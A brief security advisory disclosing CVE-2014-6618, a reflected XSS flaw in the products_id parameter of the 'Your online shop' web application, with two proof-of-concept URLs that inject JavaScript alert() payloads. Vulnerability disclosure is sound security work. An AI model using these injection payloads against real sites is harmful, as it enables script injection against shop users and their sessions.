Title: 		Your online shop GET Reflected XSS
Severity: 	High
CVE-ID: 	CVE-2014-6618
Release Date:	20 September 2014 
Author: 	Kenneth F. Belva
Websites:	http://silverbackventuresllc.com
		http://xssWarrior.com 
		http://securitymaverick.com
Twitter: 	@infosecmaverick
Contact:	Please use website contact form.
Mail: 
URL: 		http://sourceforge.net/projects/youronlineshop/
Vendor: 
Remote Exploit:	Yes

Discovered with: xssWarrior - http://xssWarrior.com



Description:
============

XSS in both the script and HTML tags for the products_id field.


Proof of Concept :
==================

Script Tags
http://[domain]/youronlineshop/youronlineshop/?seccion=ver_prod&products_id=test%22%29;+alert%2810%29;+//

HTML Attribute
http://[domain]/youronlineshop/youronlineshop/?seccion=ver_prod&products_id=test%22/%3E%3Cscript%3Ealert%2811%29%3C/script%3E%3C